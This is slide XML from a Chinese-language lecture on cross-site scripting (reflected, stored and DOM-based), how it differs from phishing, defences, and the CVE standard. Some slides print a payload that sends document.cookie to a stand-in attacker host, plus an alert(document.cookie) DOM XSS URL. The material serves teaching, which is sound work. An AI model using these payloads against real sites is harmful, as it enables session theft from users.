            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Set-Cookie: sessId=182912djfk123203;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者在网站页面中设定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="流程图: 过程 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="4221163"/>
            <a:ext cx="7704137" cy="1944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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>https://abc-app.com/error.php?message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;script&gt;var+i=new+Image;+i.src="http://abc-attacker.com/"%2bdocument.cookie;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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8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a:t>	3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户请求攻击者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>url</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器响应请求，响应中包含攻击者的代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户浏览器执行嵌入的恶意脚本代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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en-US" dirty="0"/>
              <a:t>结果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500" latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=new Image; i.src=http://abc-attacker.com/+document.cookie;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1476375" y="3810000"/>
            <a:ext cx="6408738" cy="1511300"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -27065"/>
              <a:gd name="adj2" fmla="val -674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t>向攻击者的服务器提出一个请求，请求中包含用户的会话令牌</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漏洞相关标准</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163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a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标准</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>提出原因</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>不同厂商对漏洞的披露没有一个广泛的边界用来提供参考，漏洞的定义多而杂，安全厂商之间对漏洞的边界划分比较模糊并趋于混乱</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>MITRE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>公司于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>1999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>年建立了“通用漏洞列表”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(common vulnerabilities and exposures)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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与钓鱼攻击的区别</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1249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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击在用户当前使用的应用程序中执行，用户能看到与其有关的个性化信息，克隆的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>站点不会显示个性化信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通常，在钓鱼攻击中所使用的克隆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>站点一经发现，就会立即被关闭</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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95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许多浏览器与安全防护产品都内置钓鱼网站过滤器，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>访问的是合法网站，较难被屏蔽</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>责任不同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>克隆网站，实际运营者不担责，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞则不同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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保存型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1269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原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果攻击者提交的数据被保存在服务器中，然后不经适当过滤或净化就推送给其他用户，此时当其他用户访问包含攻击者提交的数据的页面时，则会导致攻击者提交的脚本在其他用户的响应页面上执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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0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过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者在第一个请求中传送一些专门设计的数据，服务器接收并存储这些数据；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户查看某个包含攻击者的数据的页面，使恶意代码被响应并在受害者端开始执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push di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基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12902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DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文档对象模型（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Document Object Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>），是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>W3C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>组织推荐的处理可扩展标志语言的标准编程接口。在网页上，组织页面（或文档）的对象被组织在一个树形结构中，用来表示文档中对象的标准模型就称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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05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原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞是指受害者端的网页脚本在修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>本地页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>环境时未进行合理的处置，而使得攻击脚本被执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push di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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436563" y="877888"/>
            <a:ext cx="8229600" cy="5818187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>代码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Select your language:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>&lt;select&gt;&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>(" &lt;OPTION value=1&gt;"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>document.location.href.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>document.location.href.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>("default=")+8)+"&lt;/OPTION&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>("&lt;OPTION value=2&gt;English&lt;/OPTION&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>&lt;/script&gt;&lt;/select&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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09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结果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>受害者发送如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://www.some.site/page.html?default=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对象中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>值通过浏览器的渲染导致攻击者代码（红色部分）执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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与其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>区别</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331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基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞，由服务器响应到客户端的页面中并没有直接包含攻击的恶意代码，而是由客户端在运行时动态生成了最终执行的恶意脚本代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1341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防范原则</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不信任用户提交的任何内容，进行可靠的输入验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>尽量采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，不用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提交表单</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>任何内容输出到页面之前都必须编码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="3" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如：“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>”、“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>”、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”””</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等字符做过滤</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CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标准</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174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a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主要内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提供一个字典，为广泛认同的信息安全漏洞或已经暴露处理的弱点给出一个公共的名称</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>优点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标准化安全漏洞的名称</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使不同的漏洞库和安全工具更容易共享数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
